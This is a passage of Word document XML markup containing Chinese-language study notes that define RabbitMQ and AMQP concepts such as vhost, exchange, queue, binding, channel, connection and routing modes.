          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Rabbitmq</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> AMQP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A05A47" w:rsidRPr="00F41A4C" w:rsidRDefault="00893284" w:rsidP="005B51E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vhost</w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：虚拟主机，一个</w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>里可以开设多个</w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vhost</w:t>
      </w:r>
      <w:r w:rsidR="004F71D6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，用作不同用户的权限分离。</w:t>
      </w:r>
      <w:r w:rsidR="005B51E9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B51E9" w:rsidRPr="00F41A4C" w:rsidRDefault="005B51E9" w:rsidP="00893284">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：消息交换机，它指定消息按什么规则，路由到哪个队列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidR="00893284" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：消息队列载体，每个消息都会被投入到一个或多个队列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidR="00893284" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：绑定，它的作用就是把</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>按照路由规则绑定起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A1E64" w:rsidRPr="00F41A4C" w:rsidRDefault="008A1E64" w:rsidP="00893284">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：消息生产者，就是投递消息的程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidR="00893284" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：消息消费者，就是接受消息的程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidR="00893284" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：消息通道，在客户端的每个连接里，可建立多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代表一个会话任务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285795" w:rsidRPr="00F41A4C" w:rsidRDefault="001B470F" w:rsidP="001B4AB8">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1020"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>持久化、事务、拥塞控制、负载均衡</w:t>
      </w:r>
      <w:r w:rsidR="00527637" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、消息确认机制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006179FA" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC5A1F" w:rsidP="006179FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>路由模式：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> direct</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>模式，</w:t>
      </w:r>
      <w:r w:rsidR="00901E7C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>广播模式</w:t>
      </w:r>
      <w:r w:rsidR="00CE4844" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006179FA" w:rsidRPr="00F41A4C" w:rsidRDefault="006A4E68" w:rsidP="006179FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Connection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>而言，其实就是一个位于客户端和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4B58" w:rsidRPr="00F41A4C" w:rsidRDefault="006A4E68" w:rsidP="006179FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>信道，仅仅创建了客户端到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>之间的连接后，客户端还是不能发送消息的。需要为每一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>协议规定只有通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>才能执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
